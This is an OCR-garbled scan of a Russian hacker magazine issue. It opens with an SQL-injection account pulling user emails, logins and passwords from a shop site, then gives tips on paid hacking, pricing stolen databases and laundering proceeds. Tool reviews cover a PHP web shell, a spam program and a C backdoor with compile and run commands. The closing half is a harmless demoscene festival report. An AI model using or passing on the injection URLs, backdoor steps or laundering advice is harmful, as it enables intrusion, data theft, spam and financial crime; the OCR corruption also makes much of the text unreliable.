Гііір://еІзоп.ги/сді-Ьіп/іогит_есІііог.рІ?еѵепі=ѵіе\л/_іоріс&іоріс_ісІ=- 
1+ипіоп+зеІесі+1, етаіі, 3,4, 5+ігот+еІзоп_изегз/*&з_іехі= 

Спустя пару секунд у меня был список мыльников всех 
юзеров ру-шопа. Инъекция превосходно работала. Я по- 
менял название поля на «Іодіп»: 

Гііір://еІзоп.ги/сді-Ьіп/іогит_есІііог. рі?еѵепі=ѵіеѵѵ_іоріс&іоріс_ісІ=- 



> Никогда не сдавайся 
морально. Несмотря на 
облом с реализацией 
ХЗЗ на первом сайте, я 
успешнослил базу со 
второго. 



ПИВЕ 



>Внимание! Все 
действия взломщика 
противозаконны! Ин- 
формация предостав- 
лена исключительно с 
целью ознакомления! 
Ни автор, ни редак- 
ция затвои действия 
ответственности не 
несут! 
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1 +ипіоп+зеІес1+1 , Іодіп Д 4,5ч4гот+еІзоп_изегз/*&з_ 
1ех!= 



И извлек базу логинов пользователей. Затем 
аналогичным образом я составил запрос на 
получение паролей юзеров, который успешно 
выполнился: 

ГіНр://еІзоп.ги/сді-ЬіпДогит_есІі1:ог. рІ?еѵеп1:=ѵіе\л/_ 
іоріс&іоріс_ісІ=-1 +ипіоп+зеІесі+1 , раззѵѵогсі , 3 ,4, 5+^гот 
+еІзоп_изегз/*&з_іехі= 

Проблема заключалась лишь в том, чтобы со- 
вместить извлеченные логины и пароли. Но и 
она была решена при помощи простого 
рНр-скрипта. 

Таким образом, я успешно выполнил тестовый 
взлом в срок и приобрел постоянного клиен- 
та, который еще не раз обращался ко мне с 
подобными заказами. Но это уже совсем дру- 
гая история. 

□ Работаем на заказ 

Как ты уже понял из вышеописанного мной 
примера, взлом на заказ — дело хлопотное, 
но вполне реальное. Главное — помнить не- 
сколько основных правил, с которыми я тебе 
сейчас познакомлю: 

1. Старайся объективно оценивать свои воз- 
можности. Не берись за заказ, шансы на вы- 
полнение которого близки к нулю. В таком 
случае ты потратишь впустую и свое время, и 
время клиента, что негативно отразится на 
твоей репутации. 

2. Остерегайся кидал! Проверяй данные 
заказчика по онлайн-базам рипперов (на- 
пример, ѵѵѵѵѵѵ.кісіаіа.іпіо ). В сомнительных 
ситуациях работай через гарант (комис- 
сия, как правило, составляет около 5 % при 
сделках до $500 и около 7% при сделках 
свыше $500). 

3. Никогда не работай по предоплате, бери 
деньги только после успешного выполнения 
заказа! И вот почему. Известны случаи, когда 
человека попросту подставляли по очень про- 
стой схеме. Однажды к одному из моих друзей 
обратился клиент, который предложил ему за- 
каз и сразу оплатил его выполнение. Друг, ес- 
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тественно, согласился, и буквально через час 
был добавлен в блэк-лист — мол, деньги взял, 
а заказ не выполнил. Другу повезло: благода- 
ря широким связям в андеграунде его убрали 
из списка кидал, но осадок в душе остался. 
Не повторяй чужих ошибок. 

4 . Всегда реально оценивай сроки выполне- 
ния заказа. Если клиент настаивает на 2-х 
днях, а ты понимаешь, что за это время ты не 
успеешь развернуть фронт работ, — лучше 
откажись. Не думай, что ты сможешь «вкалы- 
вать» по 24 часа в сутки без перерыва на сон и 
отдых. Даже я сплю минимум по 4 часа в день, 
не смотря на мой опыт и привыкший к бессон- 
ным ночам организм. Взлом требует макси- 
мальной концентрации, которая невозможна 
после пяти суток безотрывного сидения за 
монитором. 

5 . Никогда не завышай и не занижай цену за- 
каза. В первом случае ты потеряешь клиента, 
а во втором — останешься без денег. Здесь 
нужна «золотая середина». Создать единый 
прайс с расценками на услуги по взлому не 
представляется возможным, так как на сумму 
оплаты влияют многие факторы: сложность 
выполнения, сроки и т.д. Скажу лишь, что 
обычный веб-шелл с поЬосІу-правами можно 
приобрести на сайте за $10, в то время как 
цена за БД с крупного финансового ресурса 
или хостинга может достигать нескольких ты- 
сяч американских рублей. 

«Правила — это хорошо, — скажешь ты. — 
Но где получить заказ?». Думаю, ответ в сти- 
ле «прямо и налево» тебя вряд ли устроит:). 
Поэтому едем дальше. Вообще, множество 
заказов распределяется на известных фору- 
мах, большая часть из которых является при- 
ватными. Поэтому, если твой авторитет не так 
высок, чтобы тусить на закрытых порталах, 
тебе придется какое-то время работать на паб- 
лик-форумах (ѵѵѵѵѵѵ.Наскгопа.ги или 
ѵѵеЬ-Ііаск.ги ). Со временем люди сами станут 
обращаться ктебе, но это напрямую зависит от 
твоей репутации. Ведь не зря говорят: «Про- 
фессионализм — это когда неты ищешь работу, 
а работа — тебя». Еще одним важным аспектом 
является наша безопасность, которой, к слову, 
много не бывает. Так что помни следующее: 



1. Анонимность в сети необходимо сохранять 
всегда и везде. Как это сделать, объяснялось 
уже много раз (почитай подшивку «Хакера»). 

2. Шифруй все данные у себя на винте. Никогда 
нельзя исключать тот факт, что за тобой придут 
люди в погонах и конфискуют твое имущество. 
Это, так сказать, издержки нашей профессии. 

3. Избегай контактов в реале. Информация о 
заказах всегда должна оставаться по ту сто- 
рону монитора. В противном случае ты мо- 
жешь в короткий срок сменить свое место 
проживания наследственный изолятор. Цени 
смысл пословицы: «Молчание — золото». 
Итак, с теорией ознакомились. Пора перехо- 
дить к активным действиям. Допустим, ты взял 
заказ и успешно его выполнил. Клиент дово- 
лен и жаждет оплатить твои услуги. Вот здесь 
— стоп. Одно дело — заработать деньги, адру- 
гое — воспользоваться ими и остаться при 
этом на свободе. Если рассматривать это с 
юридической точки зрения, то ты получаешь 
деньги за совершенное преступление. Поэто- 
му очень важно обналичить деньги тихо и не- 
заметно. Большинство финансовых операций 
в рунете совершается через ѵѵеЬтопеу. Заве- 
ди себе отдельный кипер под гонорары от за- 
казов и не свети на нем свой реальный ІР-ад- 
рес. Рекомендую лайт-версию кошелька 
(читай в соседней статье про то, что может 
пропалить ѴѴтКеерег. — Прим. ред.). Изучи 
принцип работы других платежных систем, 
обрати внимание на возможность вывода 
средств и указание личных данных. Кроме 
того, при необходимости обналичивания 
«грязных» денег советую воспользоваться 
специальными сервисами, которые работают 
под 40-50% от первоначальной суммы. Вари- 
антов здесь не такуж и много, но они есть. 

Вот и все. На этом курс по «трудоустройс- 
тву» можно считать оконченным. Как гово- 
рил вождь революции: «Работать, работать 
и еще раз работать!». 

Напоследок хотелось бы заметить, что ха- 
кинг — это, в первую очередь, образ жизни, а 
потом уже все остальное. Если ты решил про- 
сто заработать денег, то можешь идти торго- 
вать пирожками на рынке — в хакинге тебе 
делать нечего. Ш 
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> Один из лучших ВѲб-ШѲЛЛОЕ 



Мне уже порядком надоели споры в сети о раз- 
личных веб-шеллах. Поэтому представляю 
твоему вниманию ЫеіѵѵогкРіІеМападег — один 
из лучших веб-шеллов, написанных на рбр. 
Кто-то предпочитает г57зНеІІ, кто-то — с99зНеІІ, 
но ІЧРМ обладает действительно потрясающи- 
ми возможностями. Итак, по порядку: 

1. Возможность просматривать файлы хос- 
тинга через іореп и стсі. 

2 . Использование алиасов (команд, кото- 
рые прописаны в готовом списке). Особен- 
но помогает тем, кто слабо разбирается в 
*піх-системах. 

3. Сканирование сервера на открытые порты. 

4 . Му80І_-дампер. Позволяет быстро сдам- 
пить любую базу МуЗОІ_ с сервера. 

5 . Возможность установки Ьазб зНеІІ (бэкдор 
на 4000-м порту). 

6. Архивация любой папки насервере с после- 
дующей отсылкой науказанный етаіі. 

7 . Возможность послать себе на мыло любой 
файл, находящийся насервере. 

8. Перебор паролей ІѴЮ5 до 32-х симво- 
лов. Тебе необходимо отметить символы, 
по которым будет осуществляться брут, 
и прописать ломаемый тб5-хэш, после 



чего можно идти спать. Наутро, при удач- 
ном раскладе, ты найдешь в логах пасс. 

9. Подбор паролей к РТР с созданием листа с 
паролями. Причем ІЧРМ умеет создавать пас- 
сы с использованием гласных и согласных 
букв, получая выражения, которые могут ис- 
пользоваться в паролях. 

10. Спамер + генератор баз мыл. Надо ска- 
зать, что валидность сгенеренных листов 
не превышает 40%, но сам спамер работа- 
ет отлично. Так что, если у тебя есть пара 
десятков шеллов, смело можешь заняться 
рассылкой. 

1 1 . Загрузкалюбого файлас любого хостинга, 
не прибегая кѵѵдеіДеісб/сигІ (все реализовано 
средствами рбр). 

12. Флуд етаіі. Особенно полезен в том слу- 
чае, когда необходимо зафлудить чье-либо 
мыло. С одного шелла делать это бессмыс- 
ленно, но вот с нескольких. . . 

13 . Сканирование открытых портов на 
сервере. 

14. Просмотр логов СрапеІ. 

Я перечислил лишь основные функции ЫРМ 
— на самом деле их гораздо больше. Поэ- 
тому можешь не раздумывая использовать 
ІМеіѵѵогкРіІеМападег в своей повседневной 
работе. Кроме того, скрипт умеет обходить 
включенный ЗаІе_МосІе режим в рНр, что не- 
сомненно поможеттебе при взломе очередно- 
го хостинга. 

▼ ПРОГРАММА: 

ОС: 

АВТОР: 

Если ты читаешь этот раздел, то, скорее все- 
го, в асе ты не только болтаешь с девушками, 
ной ведешь разговоры о работе. Азнаешь ли 
ты, что использовать ІСО с каждым днем ста- 
новится все небезопаснее? Не секрет, что 




[остойная замена ІСО 



агенты ФБР зачастую наведываются в АОІ_ 
(Атегісап Оп-І_іпе), как к себе домой. И дело 
тут не в том, какие соксы ты используешь и 
хранишь лихисториусебя навинте, вседело 
в логах, хранящихся на серверах АОІ_'а. В 
последнее время нередки случаи передачи 
данных спецслужбам, которые активно изу- 
чают деятельность ярких представителей 
андеграунда. В такой ситуации единствен- 
ный выход — использование аналогичного 
мессагера. Сразу скажу, что мыслей и слу- 
хов об этом ходит много. Поговаривают, что 
несколько команд собираются объединить 
свои силы для написания такого сервиса, 
который не будет зависеть от других кли- 
ентов обмена мгновенными сообщениями. 
Но на данный момент все это только слухи, 
поэтому необходимо искать более реаль- 
ный вариант. Существует разработка РМ 
ІМ (Риззіап МаЯа ІпІегпеІ Меззадег) от Яи24 
Теат, но онаявляется просто модификаци- 
ей клиента <^аЫоег». 

На мой взгляд, внимания заслуживает 38Т 
(Зесиге Збииіе Тгапзроіф. Данная тулза обла- 
дает рядом возможностей: 

1. Шифрование всех передаваемых сообще- 
ний 128-битным ключом. 
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2. Использование специального файла клю- 
чей для аутентификации личного аккаунта, 
что затрудняет угон номера, в отличие от ІСО. 

3. Возможность коннекта через зоскз 
4\зоскз5-сервер. 

Кроме того, в 38Т есть функция проведе- 
ния конференций, что заметно облегчает 
обсуждение вопросов несколькими людь- 
ми одновременно. Также на момент сдачи 
рубрики в печать сервис выдавал при реги- 
страции 6-значные номерки вполне симпа- 
тичного вида. Поэтому настоятельно сове- 
тую поторопиться, учитывая, что многие из 
моих знакомых уже давно перешли на ЗЗТ. 
Абсолютной анонимности не существует, 
также как и не существует абсолютной 
безопасности, но, как говорится, береже- 
ного Бог бережет.. 



▼ ПРОГРАММА: 
ОС: 

АВТОР:. 




В этом выпуске хочу представить тебе не 
совсем обычную спам-утилу под названием 
ІІЗрат. Как я уже упоминал в одном из номе- 
ров журнала, существуюттри основных мето- 
да рассылки спама: 

1 . Директ-рассылки. 

2. Спам через соксы. 

3. Ботнет. 

Но есть еще один способ — спам через ак- 
каунт етаіі-сервиса. Именно его использует 
ІІЗрат. Сама схема рассылки выглядит сле- 
дующим образом: программа коннектится к 
етаіі-серверу с указанными данными от ак- 
каунта, затем посылает несколько запросов 
на отправку письма определенному адреса- 
ту, после чего отсылает мессагу и разрывает 
соединение. Вроде бы все просто, но это не 
совсем так. Дело в том, что в данный момент 
некоторые етаіі-сервисы устанавливают 
таймаут-соединения + ограничения на чис- 
ло коннектов с одного ІР-адреса. ІІЗрат на- 
писан исключительно для работы с е-таіі.ги 
( е-таіі.ги . ѵіртаіі.ги . зирегтаіі.ги . аоісітаіі.ги . 
аоІсІептаіІ.пА поэтому тебе необходимо за- 



регистрировать аккаунт именно на этом сер- 
висе. После этого смело запускай софтину и 
заполняй соответствующие поля: 

1 . 1_одіп/Разз\люгсІ — логин и пасс от мыльника. 

2. ІР'шники портпроксика, еслиты не собира- 
ешься светить свой адрес:). 

3. Загрузка етаіі-листа. 

4. Количество потоков соединений и интер- 
вал отправки (главное здесь — нежадничать 
и исходить из пропускной способности сво- 
его канала). 

5. Текст письма, етаіі отправителя, зЩесЕ 
Как ты уже заметил, тулза является мульти- 
поточной, что не может не радовать. Мак- 
симального результата можно достичь, 
запуская утилиту на дедиках (выделенных 
серверах) с широкими каналами. Конечно, 
для серьезных миллионных рассылок нужно 
юзать совсем другой софт (о котором я уже 
писал и еще напишу), но для спама по отно- 
сительно небольшой базе ІІЗрат вполне 
подходит. 

ж ПРОГРАММА: 

ОС: 

Меня часто спрашивают, какими бэкдора- 
ми я предпочитаю пользоваться. Но здесь 
сложно дать однозначный ответ. Во-пер- 
вых, каждый выбирает под себя, а во-вто- 
рых, многое зависит от конкретной ситуа- 
ции. Ведь случается, что использовать 
обычный бэкдор невозможно, тогда при- 
ходится прибегать к коннект-бэку, обходя 
ограничения, установленные на атакуе- 
мом сервере. Что касается стандартных 
бэкдоров, то среди них я отдаю предпоч- 
тение Зітріе ЬасксІООг (ЬсІ. с), написанно- 
му на С и отлично зарекомендовавшему 
себя в боевых условиях. Тебе достаточ- 
но залить файл ЬсІ. с на нужный сервер и 
скомпилировать его таким образом: 

дсс ЬсІ. с -о ЬсІ 

После этого можешь запускать бэкдор на оп- 
ределенном порте: 

./ЬсІ <роп> <раз#рг 

Еслиты нехочешьуказывать пароль, то просто 
скомандуй: 

! ./Ьсі Ші^ШШ 

Все. Далее коннектись к серверу на от- 
крытый порт и наслаждайся полноцен- 
ным шеллом. Только не забывай о том, 



что не стоит оставлять бэкдор на сер- 
вере — «поел — убери за собой»:). Ру- 
ководствуясь этим правилом, ты будешь 
долгое время оставаться незамеченным 
в системе. А если у тебя не достаточно 
прав для запуска дсс — скомпили ЬсІ. с за- 
ранее и залей бэкдор на сервер уже в го- 
товом виде. Кроме того, сорец содержит 
в себе комментарии, так что при желании 
(и хотя бы частичном знании С) ты смо- 
жешь отредактировать бэкдор, улучшив 
его функциональность. 

Одним словом — стабильного коннекта, 
коллега! 

▼ ПРОГРАММА: 

ОС: 

АВТОР: 
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> Тулза для запуска приложении в 
«песочнице» 



Если ты любишь «экспериментировать» 
с софтом, умеешь держать в руках дизас- 
семблер, тестируешь регулярно не один 
десяток программ, занимаясь их отладкой, 
то ЗапсІЬохіе создана специально для тебя. 
Эта тулза позволяетзапускать браузер или 
другие программы таким образом, чтобы 
л юбые изменения, связанныес использова- 
нием софта, были сохранены в ограничен- 
ной среде (так называемой «песочнице»), 
которую возможно будет удалить позже. В 
результате ты всегда можешь быстро ис- 
править любые изменения, связанные с 
модификацией реестра и/или других пара- 
метров системы. Если файл был загружен 
внутри сессии песочницы, то он будет уда- 
лен при очистке бокса. Утила позволяет со- 
здавать несколько различных «песочниц» 
под твои оправданные нужды:). Программа 
стартует в системном трее, и для активации 
«песочницы» достаточно запустить нужную 
прогу через иконку в ЗапЬЬох'е. Утилита 
содержит множество настроек, управлять 
которыми ты можешь с помощью редакти- 
руемого конфигурационного файла. В об- 
щем, настоятельно рекомендую установить 
данную тулзу. Уверен, что она пригодится 
тебе еще не раз. 2-Е 
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26 АВГУСТА ЖДАЛИ МНОГИЕ. ДЕМОСЦЕНЕРЫ, ХУДОЖНИКИ, МУЗЫКАНТЫ, ХАКЕРЫ, ВАРДРАЙВЕРЫ, ПРОСТО КОМПЬЮ- 
ТЕРЩИКИ, ВКЛЮЧАЯ МЕНЯ. ИМЕННО В ЭТОТ ДЕНЬ СТАРТОВАЛ КРУПНЕЙШИЙ В РОССИИ ЕЖЕГОДНЫЙ КОМПЬЮТЕРНЫЙ 
ФЕСТИВАЛЬ СНАОЗ СОИЗТРЫСТЮМЗ. НА ЭТОТ РАЗ ОРГАНИЗАТОРЫ ОБЕЩАЛИ ВСЕМ НЕЧТО ОСОБЕННОЕ, ПОЭТОМУ 
Я ПРОСТО НЕ МОГ ПРОПУСТИТЬ ЭТО СОБЫТИЕ... 



тот момент, когда ЦЦ06 распах- 
нул свои двери, народ повалил 
внутрь, а организаторы объявили 
о начале фестиваля, начались первые ком- 
по. Дядя Майнд спал в обнимку с подушкой и 
видел эротичные сны. «Вставай, сцуко лени- 
вое! — на самом интересном моменте явился 
мне загадочный образ. — Туса в самом раз- 
гаре!». Вскочив с постели и закинув в себя 
пару бутербродов, я рванул к месту встречи. 
В этом году привычное для предыдущих конс- 
тракшенов здание торгового комплекса ЛДМ 
сменилось на выставочный центр «Евразия». 
Все разъяснилось тогда, когда увидел размах 
пати. Организаторы заботливо нарисовали на 
сайте подробный план, чтобы сценеры не за- 
блудились. Хотя ориентироваться было прос- 
то — повсюду блуждали парни в футболках с 
надписями в духе «Зсепе по! беасі», пьющие 
пиво и что-то оживленно обсуждающие. Внут- 
ри здания меня сразу остановили серьезного 
вида охранники, которые не узнали в лицо 
самого тіпсІѵѵОгк’а и потребовали пропуск (бу- 
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мажные полоски разных цветов, которые все 
носили на запястье). Пришлось вызванивать 
Тоху (известного тебе по статьям в «Хакере»), 
в этом году занимавшегося организацией хак- 
компо. 

Достаточно былотолько взглянуть наглавный 
зал, чтобы сразу почувствовать атмосферу 
фестиваля. Отличия от предшественников 
были более чем заметными. На этот раз ор- 
ганизаторы не просто арендовали помеще- 
ние и показывали на большом экране рабо- 
ты. Они предоставили посетителям места и 
техническую возможность для подключения 
компа к локальной сети, в результате чего 
получилась настоящая І_А[\І-Рагіу. Народу с 
ноутбуками и писюками, как видно на скрин- 
шотах, было достаточно, ведь для всех, кто 
пришел со своим компом, вход был бесплат- 
ным. Пати по духу мне напомнило АззетЫу 
— тот же полумрак, повсюду огни от экранов 
компьютеров, толпы движущихся в разных 
направлениях сценеров, да и просто ощуще- 
ние глобальной тусы. 



Весь зал был поделен на несколько секций. 
Большую часть (центр) занимали юзеры с 
компами. За все время проведения фести- 
валя я увидел лишь пару человек, которые 
играли. Народ в основном или качал с сетки 
варез, или серфил инет, или что-то активно 
кодил. Процентов девяносто сидели на ноу- 
тах. Желающих подключиться было больше, 
чем выделенного места, поэтому некоторые 
работали, что называется, на коленях. Один 
из организаторов даже публично просил тех, 
кто сидел на ѴѴі-Рі, уступить место с розеткой 
еФегпеГчикам. 

Слева от входа расположились стенды 
партнеров и спонсоров фестиваля. Среди 
них — компания ІРВЕЕ, разрабатывающая 
мультимедийные приложения, представите- 
ли Эеер Арріе, фирма Кефіізи — аниматор 
и разработчик мобильных игр, а также небе- 
зызвестная МісгозоЙ. У каждого стенда дежу- 
рил представитель, с которым можно было 
пообщаться и узнать все, что угодно: како са- 
мой компании, так и ее продукции. Например, 
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Місгозоіідемонстрировал свой МебіаСепіег, 
который я вначале перепутал с ѴѴіпбоѵѵз Ѵізіа. 
Кстати, с М5 на фестивале постоянно про- 
исходили странные происшествия. То неиз- 
вестные хакеры через открытый ѴѴі-Рі досил и 
комп мелкомягких, из-за чего периодически 
на стенде красовался «синий экран смер- 
ти», то потом кто-то под шумок стащил флаг 
компании, судьба которого стала известна 
незадолго до закрытия фестиваля, а именно 
на показе фоток, сделанных посетителями. 
Фотография, щелкнутая где-то возле здания 
«Евразии», демонстрировала майкрософ- 
товское знамя, а на переднем плане стоял 
сценер, подносящий к нему зажигалку для 
ритуального сожжения. 

Приятной фишкой СС06 стало наличие двух 
дополнительных экранов, находившихся в 
конце зала. На одном из них крутили фильмы 
(«Орегаііоп Такебоѵѵп», «Сурбег», «Пираты 
Кремниевой долины», «Бойцовский клуб», 
«Беги, Лола, беги»), разные клипы под саун- 
дтреки из фильма «Хакеры», а также хакви- 
део из ] [. У другого дежурил небезызвестный 
амижник Ѵіпппу (он недавно писал о демос- 
цене на Амиге), который включал сценовые 
видеоролики. Так что те, кому была не особо 
интересна демонстрация конкурсов на глав- 
ном экране, могли воспользоваться этим 
бесплатным кинотеатром. 

Уже традиционной для всех СС стала выстав- 
ка раритетных компьютеров. В этом году экс- 
понатов стало вдвое больше по сравнению с 
прошлым — всего около 60. В числе прочих 
были ПЭВМ Роботрон 1715, Искра ЮЗОМ, 
4-мегагерцная ЕСка с 512 Кб на борту (кор- 
пус у нее массивнее, чем на некоторых со- 
временных серваках), РоѵѵегМас 03333 Мгц, 
оттюнингованная 4-ка, Соттобоге 64, древ- 
няя ямаха, ноутбук фирмы Огіб, какая-то ис- 
торическая видеоприставка и вершина ком- 
пьютеростроения — ат5х86-133, засунутый 
моддером в корпус пылесоса. Само собой, 
на каждом из этих агрегатов можно было 
поклацать и поиграть. Один чувак конкретно 



засел за Бобе Риппег и умудрился дойти до 34 
уровня. А рядом, сидя на коленяху папашки, в 
виртуальные кубики играл 5-летний сценер. 
Некоторые экспонаты представляли такую 
историческую ценность, что были помеще- 
ны за витрину — не хватало только таблички 
«Руками не трогать». Возможно, в Питере 
скоро появится новый музей компьютерной 
истории — организаторы сейчас занимают- 
ся поиском помещения, где будут выставле- 
ны все эти машинки. 

Рядом с выставкой находилась отдельная 
комната, в которой на протяжении фестива- 
ля проводились реалтаймовые компо. Всем 
желающим предлагалось прямо на пати за 
выделенное время (в районе полутора часов) 
нарисовать картинку, закодить прогу или на- 
писать музыку. А самым оживленным местом 
был Инфодеск, где висело расписание и ту- 
сили организаторы. 

Так как многие посетители СНаоз Сопзіги- 
сііопз приезжают издалека, для некоторых 
проблема «где остановиться в эти дни» стоит 
особенно остро. Если раньше оргсостав мог 
только помочь найти недорогую гостиницу, 
то в этот раз они взяли пример с Ассембли, 
выдел ив место для ночлега прямо на пати. Ко- 
нечно, не пятизвездочная гостиница, но глав- 
ное — сравнительно тихо и никто не мешает. 
Кроватей, правда, в чил-ауте не было пре- 
дусмотрено, поэтому сценеров предупреди- 
ли, что надо брать с собой спальники. Пати 
с 26 по 27 работало в режиме нон-стоп, так 
что засидевшийся до утра сценер мог тут же 
вздремнуть и потом вернуться к своим сце- 
нерским делам. Большинство из них, правда, 
не покидали насиженные места всю ночь, 
тем более что из-за смещенного расписания 
некоторые компо крутили именно ночью (2Х 
бето в 24:00 только начиналось). А потом до 
утра крутил и лучшие демки с других демопати 
и фильмы о сцене. 

Еще одной приятной традицией фестиваля 
является бесплатный вход для всех девушек 
(вообще, цена билета на 2 дня составля- 



ла 300 рублей, если ты пришел без компа). 
Подкованных в компах теток становится все 
больше, поэтому на СС я встречал женские 
лица сплошь и рядом. Причем во время кон- 
курсов они смотрели на экран с нескрывае- 
мым интересом. 

□ Сценовые компо 

Каки напредыдущихСС, конкурсные работы 
были представлены на двух платформах: РС 
и 2Х-Зресігит плюс одна работа для амиги от 
АтіРІІЗ & Зітоп л СРБІ и несколько номина- 
ций в СотЬіпеб МоЬіІе (мобильники). 2Х-гра- 
фика предложила зрителю небольшое коли- 
чество работ — всего 14. Самой популярной 
темой у художников-спетрумистов остаются 
тетки: добрая половина работ демонстриро- 
вала женские ноги, груди и просто лица. Но 
сценеров этим уже давно не проймешь, по- 
этому первое место занял гремлин-панк в зе- 
леных волосах, розовых туфлях и с разбитой 
гитарой. В качестве темы для реалтайм IX 
дЬ< сотро организаторы предложили нари- 
совать за полтора часа какое-нибудь мифи- 
ческое существо. В итоге 2 и 3 место подели- 
ли драконы, а первое досталось каменному 
зломутанту, обросшему деревьями. 

На IX бето прислали только 3 работы. Де- 
мка-победитель под названием «Сри бискз 
уои» меня как-то не впечатлила. Уже давно 
приевшийся эффект плазмы периодически 
сменялся оцифрованными фотками мембе- 
ров группы СРІ), которые пропагандировали 
любовь к уткам: «Маке бискз, поі ЬотЬз», 
и все это великолепие происходило под 
какую-то отстойную музыку. «ТНе Мігасіе 
оі уои», занявшая второе место, была ори- 
гинальнее. Автор поделился в своей деме, 
что он ощущает себя призраком, — отсюда 
мрачная мелодия и пессимистичная картина 
с анимированными пикселями, летающими 
по экрану. Третья работа — по сути, сборник 
традиционных спектрумовских эффектов 
без какой-либо связующей идеи, поэтому 
она заняла только третье место. Кстати, я 
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заметил, что картинки, которые использо- 
вались в спектрумовских демах, были вы- 
ставлены на 7.x дЬ< сотро. Организаторам 
— незачет, надо такое дело фильтровать. В 
512 байт IX интро победителем стал кодер 
из все той же СРІІ. Конкурсант сделал 
эффект рисующихся в реалтайме цвето- 
чков, падающих с неба на землю. Для 512 
байт вполне неплохо. Музыка для спектрума 
разделялась на АУ (стандартный музыкаль- 
ный процессор) и ТигЬо 8оипб (чип на двух 
АУ для получения 6-ти каналов), но прослу- 
шать я их не успел. 

Так что 7.Х хоть и жив стараниями фанатов, 
но количество работ и их качество говорит, 
что для него настали не лучшие времена. 
Причем уже давно. 

На РС разнообразие графических конкур- 
сов было пошире. Тут соревноваться мог- 
ли не только художники, но и фотографы, 
АЗСІГшники, рендеры. А для тех, кто не при- 
знает правил в оформлении работ, имелся 
Ргеезіуіе. Работы в рисованной графике 
были совершенно разными и большинство 
хорошего уровня: отизображения солдатна 
поле боя и запечатленной страстной ночи до 
большого робота и авторской фантазии на 
тему будущего ЦЦ. Победителем стал фан- 
тастический пейзаж под названием «ІМаіиге 
із Ьаск», изображающий природу на фоне 
урбанистического города. В А5СІІ діх ниче- 
го выдающегося не оказалось — мне пон- 
равились только пару апз’ишек от некоего 
_пТ л РеВігіІп и работа Раде с изображением 
надписи «РАСЕ», плавно переходящей в че- 
ловеческий анфас (выполнено это в стиле 
старых работ Слэша — известного и теперь 
уже неактивного художника на азсіі-сцене), 
котрая заняла первое место. 



В рендеринге (смоделированные в ЗЭ-ре- 
дакторах картины) номинантов было всего 
5, с большим отрывов победила работа 
«Яезізіапсе Із РіЛіІе» РоуаІ ОИозі’а, фаво- 
рита многих конкурсов ЗО-графики. Не 
знаю, брал ли автор за образец фотку ак- 
трисы Конни Нильсен, но получилось, как 
видишь на скрине, очень похоже. Второе 
место тоже оказалось заслуженным: при- 
севшая отдохнуть воительница в кожаном 
прикиде с автоматом в руке смотрелась 
очень реалистично. 

В конкурсе логотипов поучаствовали пред- 
ставители нескольких известных сценовых 
групп: СЫрсиІІ, Сгоіух, СНаоз Епегду, іеат 
Роѵѵег Атіда, 1183В и даже организатор 
пати Егод. Разрыв в голосах между первым и 
вторым местом был минимальным, Энергия 
Хаоса вырулила у амижников за счет ориги- 
нального дизайна в «грязном» стиле. 

По мнению многих участников ЦЦ, конкурс 
фотографий был лишним. Тем не менее, он 
дал возможность проявить себя не только 
сценерам, но и простым юзерам. Кто-то из 
участников просто сходил и сфотал полянку 
во дворе, другие подошли к делу творчески, 
запечатлев ящерицу на стекле. Золотую ме- 
даль завоевала фотка малыша, раздвинув- 
шего ручонки, и не последнюю роль в этом 
сыграло удачное название: «Байки юного 
рыбака». Правда, больше всего аплодис- 
ментов сорвала не она, а фотка с изобра- 
жением какого-то мрачного заброшенного 
кладбища, на переднем фоне которого вы- 
сился дорожный знак «ЗТОР». 

В фристайле многие работы были откро- 
венной халтурой, и я не представляю, как 
первое место мог занять обработанный за 
пару минут в фотошопе пейзаж. Две рабо- 



ты художника ЬгН с изображением бабочки 
и стрекозы были намного интереснее, хо- 
тя бы по стилю исполнения. В этом компо 
не осталась обойденной нашумевшая тема 
с Зиданом: один из авторов запечатлел 
Мальвину, сбивающую метким ударом в 
грудь Буратину. Она заняла второе место. 
Еще вспоминается картинка с заморожен- 
ными во льду клавишами от клавиатуры 
— вполне креативно. 

Как и спектрумовскую, писишную музыку я 
пропустил, но если у тебя есть желание оце- 
нить все своими ушами, то на диске кжурна- 
лу ты найдешь все работы, участвовавшие 
в ЦЦ. 

Самыми ожидаемыми компо, которые со- 
бирают больше всего народу и которые ор- 
ганизаторы всегда оставляют «на десерт», 
были, конечно, РС 64К іпіго и РС Оето. Уз- 
нать о начале этих конкурсов можно было 
по громкому свисту одобрения и частым ап- 
лодисментам, раздававшимся из главного 
зала. И надо сказать, аплодисменты звучали 
не зря. Несмотря на то, что в 64к интро было 
представлено только 4 работы, явной лажи 
среди них не было. Описать каждую рабо- 
ту трудно, это надо видеть своими глазами, 
скажу только, что последние годы сценеры 
активно используют трехмерную камеру, 
свободно летающую вокруг смоделиро- 
ванных помещений/фигур, а также стара- 
ются придать новую форму традиционным 
эффектам. Интруха «ОІТл/огІсІ», занявшая 
первое место, стала дебютом ипс&ргезіоп 
и произвела на всех большое впечатление. 
Технологичная, детализированная и в то же 
время требовательная к ресурсам. Смот- 
рится отлично как на мониторе, так и на не- 
большом экране, да и техно-музыка подоб- 
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рана в самый раз. Второе место осталось за 
« Рогт Расіог’ом » — совместной роботой ГОх 
Іозі зоиі и ипс. Кстати, интра, получившая 3 
место, также была создана сценером ипс. 
Воистину, широка сцена талантами! 

На конкурсе демоктакже было на что посмот- 
реть. Расскажу вкратце о каждой работе: 
8іІеп{ Зрасе — дема, показывающая под 
умиротворяющую музыку кусочек вымыш- 
ленного рая: голубой океан с дельфинами, 
белоснежная яхта, золотой пляж с пальма- 
ми, бунгало, прибрежная дорога и желтое 
феррари, уносящееся за горизонт. 

Е-Моііоп — вначале под военный марш мы ви- 
дим армию черно-белых шагающих роботов, 
за которой следует бронированный поезд. 
Но потом тема вдруг резко меняется, экран 
наполняется цветом, а музыка переходит в 
спокойный чил-аут, и друг за другом следуют 
различные трехмерные эффекты (особенно 
мне понравились мыльные пузыри). 

ТгазИ — чей-то эксперимент с видеокаме- 
рой, которой оператор заснял мрачный 
двор, разбавленный чертежами. Камера по- 
стоянно дергается, из-за чего разглядеть, 
что творится наэкране, сложно. В принципе, 
дема оправдывает свое название и больше 
подошла бы для какого-нибудь фристайла. 
Оаіа — «Они обманывали сами себя, они от- 
рицали свою участь, но пробил час истины, и 
настал конец их дней» , — такими оптимистич- 
ными словами начинается дема, демонстри- 
рующая вид Земли из космоса. Заканчивает- 
ся все, каки обещано, ядерным взрывом. Очень 
понравилась игра света в этой деме, особенно 
когда камера оказывается под водой. 

РеаІзЫІ: — куча разных эффектов, намешан- 
ных друг с другом и сменяющихся без пере- 
рыва, в итоге в этом винегрете мало что можно 



понять. В конце появляется анимированная 
